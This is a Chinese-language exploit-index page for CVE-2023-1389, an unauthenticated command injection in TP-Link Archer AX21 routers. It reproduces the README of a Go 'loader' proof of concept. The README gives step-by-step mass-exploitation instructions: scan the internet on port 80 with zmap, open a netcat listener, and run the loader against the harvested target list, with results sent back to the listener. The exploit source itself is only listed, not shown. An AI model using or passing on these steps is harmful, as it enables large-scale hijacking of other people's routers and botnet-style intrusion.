POC详情: aeaeb979947af3e3fa8913f5fa0193b93dcd941d

来源
关联漏洞
标题: TP-LINK Archer AX21 命令注入漏洞 (CVE-2023-1389)
描述:TP-LINK Archer AX21是中国普联(TP-LINK)公司的一款无线路由器。 TP-LINK Archer AX21 1.1.4 Build 20230219之前的固件版本存在安全漏洞,该漏洞源于存在命令注入漏洞,未经身份验证的攻击者利用该漏洞可以通过简单的POST请求注入以root身份运行的命令。
描述
TP-Link Archer AX21 - Unauthenticated Command Injection [Loader]
介绍
TP-Link Archer AX21 - Unauthenticated Command Injection [Loader POC]
# CVE-2023-1389
# Exploit Title: TP-Link Archer AX21 - Unauthenticated Command Injection
# Date Found : 07/25/2023
# Exploit Author: Voyag3r


```
How to Use :-

*Scanning*
- Use Zmap  : zmap -p 80 -o list.txt 

*NetCat Listener
- apt install netcat -y
- nc lnvp <port>

*Loader
- go run . --host=<netcat_listener_ip> --port=<netcat_listener_port> --list=list.txt --threads=<threads>

* Logging
- Error : Webserver Inactive or unresponsive
- Success : Payload Sent with Request Code 200
- Status : Response Code
```
文件快照

[4.0K] /data/pocs/aeaeb979947af3e3fa8913f5fa0193b93dcd941d ├── [ 142] go.mod ├── [ 340] go.sum ├── [5.8M] list.txt ├── [1.8K] main.go └── [ 585] README.md 0 directories, 5 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。